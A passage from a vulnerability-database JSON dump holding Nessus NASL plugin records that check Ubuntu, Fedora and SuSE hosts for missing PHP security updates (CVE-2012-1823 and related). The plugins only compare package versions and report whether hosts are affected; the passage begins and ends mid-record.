attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1437-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php5-cgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.15\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.5-1ubuntu7.8\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-cgi\", pkgver:\"5.3.6-13ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5-cgi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 16 : maniadrive-1.2-32.fc16.5 / php-5.3.13-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.5 (2012-7586)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7586.NASL", "href": "https://www.tenable.com/plugins/nessus/59266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7586.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59266);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n\n script_name(english:\"Fedora 16 : maniadrive-1.2-32.fc16.5 / php-5.3.13-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.5 (2012-7586)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081285.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?804c30d0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae564cca\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081287.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?61b39ea9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"maniadrive-1.2-32.fc16.5\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-5.3.13-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-eaccelerator-0.9.6.1-9.fc16.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7628.NASL", "href": "https://www.tenable.com/plugins/nessus/59268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7628.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59268);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7628\");\n\n script_name(english:\"Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080952.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1eea669\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a831d09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected maniadrive and / or php packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"maniadrive-1.2-40.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"php-5.4.3-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:37:35", "description": "This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.2 Security Update : PHP5 (SAT Patch Number 6251)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:php53-fileinfo", "p-cpe:/a:novell:suse_linux:11:php53-ftp", "p-cpe:/a:novell:suse_linux:11:php53-mysql", "p-cpe:/a:novell:suse_linux:11:php53-calendar", "p-cpe:/a:novell:suse_linux:11:php53-curl", "p-cpe:/a:novell:suse_linux:11:php53-zlib", "p-cpe:/a:novell:suse_linux:11:php53-soap", "p-cpe:/a:novell:suse_linux:11:php53-sysvshm", "p-cpe:/a:novell:suse_linux:11:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php53-bz2", "p-cpe:/a:novell:suse_linux:11:php53-wddx", "p-cpe:/a:novell:suse_linux:11:php53-suhosin", "p-cpe:/a:novell:suse_linux:11:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php53-odbc", "p-cpe:/a:novell:suse_linux:11:php53-ldap", "p-cpe:/a:novell:suse_linux:11:php53-gd", "p-cpe:/a:novell:suse_linux:11:php53-xsl", "p-cpe:/a:novell:suse_linux:11:php53-ctype", "p-cpe:/a:novell:suse_linux:11:php53-pear", "p-cpe:/a:novell:suse_linux:11:php53-bcmath", "p-cpe:/a:novell:suse_linux:11:php53-pcntl", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php53-dom", "p-cpe:/a:novell:suse_linux:11:php53-openssl", "p-cpe:/a:novell:suse_linux:11:php53-mbstring", "p-cpe:/a:novell:suse_linux:11:php53-intl", "p-cpe:/a:novell:suse_linux:11:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php53-sysvsem", "p-cpe:/a:novell:suse_linux:11:php53-iconv", "p-cpe:/a:novell:suse_linux:11:php53-pspell", "p-cpe:/a:novell:suse_linux:11:php53-exif", "p-cpe:/a:novell:suse_linux:11:php53-pdo", "p-cpe:/a:novell:suse_linux:11:php53-tokenizer", "p-cpe:/a:novell:suse_linux:11:php53-zip", "p-cpe:/a:novell:suse_linux:11:php53-dba", "p-cpe:/a:novell:suse_linux:11:php53-fastcgi", "p-cpe:/a:novell:suse_linux:11:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:11:php53-pgsql", "p-cpe:/a:novell:suse_linux:11:php53-xmlreader", "p-cpe:/a:novell:suse_linux:11:php53-gmp", "p-cpe:/a:novell:suse_linux:11:php53-mcrypt", "p-cpe:/a:novell:suse_linux:11:php53", "p-cpe:/a:novell:suse_linux:11:php53-json", "p-cpe:/a:novell:suse_linux:11:php53-shmop", "p-cpe:/a:novell:suse_linux:11:php53-gettext", "p-cpe:/a:novell:suse_linux:11:php53-snmp"], "id": "SUSE_11_APACHE2-MOD_PHP53-120504.NASL", "href": "https://www.tenable.com/plugins/nessus/64103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64103);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 11.2 Security Update : PHP5 (SAT Patch Number 6251)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752030\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6251.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-mod_php53-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-5.3.8-0.27.1\")) flag++;\nif 